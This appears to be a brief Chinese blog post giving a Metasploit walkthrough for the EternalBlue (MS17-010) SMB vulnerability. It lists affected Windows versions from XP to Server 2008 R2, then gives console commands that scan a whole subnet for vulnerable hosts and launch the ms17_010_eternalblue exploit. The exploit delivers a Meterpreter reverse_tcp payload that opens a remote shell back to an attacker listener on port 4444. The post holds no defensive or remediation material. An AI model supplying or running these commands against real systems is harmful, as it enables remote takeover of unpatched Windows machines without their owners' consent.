目录
永恒之蓝(ms17-010-eternalblue)漏洞利用
适用版本
- Windows XP (all services pack) (x86) (x64)
- Windows Server 2003 SP0 (x86)
- Windows Server 2003 SP1/SP2 (x86)
- Windows Server 2003 (x64)
- Windows Vista (x86)
- Windows Vista (x64)
- Windows Server 2008 (x86)
- Windows Server 2008 R2 (x86) (x64)
- Windows 7 (all services pack) (x86) (x64)
目标扫描
这里以内网扫描进行测试,所有扫描内网中所有主机,并检查其是否存在此漏洞。
msf > use auxiliary/scanner/smb/smb_ms17_010
msf > set RHOSTS 192.168.1.0/24
msf > set THREADS 100
msf > exploit
漏洞攻击
确定好目标主机后,就可以使用启动监听并进行攻击
msf > use exploit/windows/smb/ms17_010_eternalblue
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.1.15
msf > set LPORT 4444
msf > set RHOST 192.168.1.110
msf > exploit
版权所有,本作品采用知识共享署名-非商业性使用 3.0 未本地化版本许可协议进行许可。转载请注明出处:https://www.wangjun.dev//2017/10/ms17-010-eternalblue/